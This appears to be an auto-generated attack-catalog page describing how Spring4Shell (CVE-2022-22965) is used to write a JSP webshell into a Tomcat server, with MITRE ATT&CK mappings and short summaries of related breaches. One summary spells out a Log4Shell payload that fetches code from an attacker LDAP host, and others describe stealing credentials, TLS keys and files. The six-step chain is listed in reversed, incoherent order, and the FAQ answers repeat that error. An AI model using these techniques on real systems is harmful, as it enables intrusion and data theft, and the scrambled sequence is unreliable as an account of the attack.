Spring4Shell (CVE-2022-22965) → JSP webshell on Tomcat
Send a crafted POST that uses Spring's data-binding to mutate Tomcat's logging configuration — turn its access log into a JSP file written under webapps/, then request it.
§ Context
Assumed environment: the target runs Spring MVC on Apache Tomcat, with Spring Framework older than 5.3.18 / 5.2.20 and JDK 9 or later (the binding chain that reaches PropertyDescriptor via class.module.classLoader exists only on JDK 9+).
§ Steps
- 01 · Request webshell from /shell.jsp · Execution · T1059 — Command and Scripting Interpreter
- 02 · Recover service creds from app config / env · Credential Access · T1552 — Unsecured Credentials
- 03 · Identify Spring + Tomcat · Reconnaissance · W-RECON-FINGERPRINT — Tech Stack Fingerprinting
- 04 · Trigger log line containing JSP webshell · Persistence · W-WEBSHELL — Webshell Deployment
- 05 · Rewrite Tomcat AccessLogValve via Spring · Execution · CVE-SPRING4SHELL — Spring4Shell (CVE-2022-22965)
- 06 · Confirm binding reaches class.module.classLoader · Execution · CVE-SPRING4SHELL — Spring4Shell (CVE-2022-22965)
§ References
§ Frequently asked
- What is the "Spring4Shell (CVE-2022-22965) → JSP webshell on Tomcat" attack path?
- Send a crafted POST that uses Spring's data-binding to mutate Tomcat's logging configuration — turn its access log into a JSP file written under webapps/, then request it. It chains 6 steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- The first step is Request webshell from /shell.jsp (T1059) — an execution primitive. Assumed environment: target runs Spring MVC + Apache Tomcat.
- What is the final impact of this kill-chain?
- The final step lands on Confirm binding reaches class.module.classLoader (CVE-SPRING4SHELL), which falls under Execution. From here, an operator typically pivots into post-exploitation or maintains persistence.
- How can defenders detect or prevent this attack?
- Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.
§ Related dossiers
- F5 BIG-IP iControl auth bypass (CVE-2022-1388) → root on LB (shared techniques: 3)
  Connection-header smuggle bypasses iControl REST auth, command-injection RCE as root. Load balancers see all traffic — recover TLS keys, session cookies, internal SSO config.
- Apache Struts S2-045 (CVE-2017-5638) → Equifax-style breach (shared techniques: 3)
  Crafted Content-Type header is parsed as OGNL — execute commands as the app user. The 2017 Equifax breach origin: unpatched Struts endpoint exposed to the internet.
- FortiGate SSL-VPN pre-auth RCE → config theft (shared techniques: 3)
  Pre-auth heap overflow / format-string against FortiGate sslvpnd grants root on the appliance. Pull the running config, decrypt stored RADIUS / LDAP / VPN-user secrets.
- MOVEit Transfer (CVE-2023-34362) → mass data exfil (Cl0p) (shared techniques: 2)
  Pre-auth SQLi in MOVEit's web UI forges an admin session. .NET deserialisation chain drops a webshell as SYSTEM. Cl0p's 2023 mass-exfil playbook: download every file under /var/files.
- Log4Shell (CVE-2021-44228) → RCE → lateral (shared techniques: 2)
  Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.
- Unpatched Confluence (CVE-2023-22515) → internal foothold (shared techniques: 2)
  Internal Confluence instance reachable from the corporate VLAN. Trivial privilege-escalation CVE creates an admin user; webshell uploaded; pivot into AD service accounts.